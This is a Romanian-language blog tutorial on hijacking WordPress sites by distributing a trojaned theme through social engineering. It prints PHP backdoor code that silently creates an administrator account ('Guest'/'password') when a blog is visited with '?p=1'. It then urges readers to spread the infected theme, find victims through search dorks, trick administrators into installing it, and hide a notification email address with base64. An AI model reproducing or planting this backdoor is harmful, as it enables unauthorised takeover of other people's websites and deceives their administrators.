Spargerea unui blog Wordpress cu ajutorul Ingineriei Sociale

Spargerea unui blog Wordpress cu ajutorul Ingineriei Sociale. Sună foarte frumos şi defapt este foarte uşor. Tutorialul ce l-am creat astăzi pentru voi nu este o idee proprie. M-am inspirat din ceva ce am citit acum foarte mult timp, un scenariu foarte bine pus la punct legat de WordPress şi anume, cum putem să luăm acces la un blog cu eleganţă şi fără a lăsa urme ca să îşi de-a seama proprietarul. Să dăm un mic exemplu. Domnul Gheorghe vrea să spargă cât mai multe blog-uri de pe o anumită nişă web. Se gândeşte cum să facă un lucru de genul ăsta. Noroc că Gheorghe este foarte inventiv şi i-a venit în minte să creeze şi să "infecteze" o temă (theme) visuală. Mulţi o să spuneţi că o să creeze un Remote Code / Command Execution (RCE). Dar nu. Pentru că ar lăsa urme. Aşa că va adăuga în temă un cod PHP care să adauge automat un nou cont cu drepturi de administrator. Codul este următorul: PHP Code: add_action('wp_head', 'wp_wordpress');function wp_wordpress() {If ($_GET['p'] == '1') {require('wp-includes/registration.php');if (!username_exists('wordpress')) {$user_id = wp_create_user('Guest', 'password');$user = new WP_User($user_id);$user->set_role('administrator');}}} Ce face codul de mai sus? Dacă este adăugat spre exemplu în templates.php (am precizat această filă deoarece este executată automat când accesăm index-ul unui blog), oricine va intra pe următorul link: http://pentesting/wp/?p=1 (primul articol de pe blog) va crea în baza de date un nou cont cu drepturi de administrator şi cu numele: Guest şi parola password. O remarcă importantă ar fi aceea că tema instalată trebuie să fie şi cea activă. Legat de ingineria socială vă descurcaţi voi că sunteţi baieţi isteţi cu mult timp liber. Puteţi posta online undeva tema şi să adaugaţi undeva anumite cuvinte pentru a crea un dork să puteţi găsi blog-urile infectate. Sau îl puteţi manipula chiar pe administrator să instaleze tema. Update Ok. Ca să fie totul complet şi pentru că nu am fost mulţumit parcă dacă nu ajutam şi cu partea asta, adică cea în care sunteţi informaţi cu ce blog a fost infectat, pe email. PHP Code: Să vă bucuraţi de metodă. Şi ca să nu vă de-a de gol adresa de mail, puteţi să o encriptaţi în base64. PHP Code: $addr=base64_decode('#Aici va fi email-ul vostru encriptat în base64'); Să nu uitaţi să stergeţi tag-urile PHP când adăugaţi în filă. Baftă.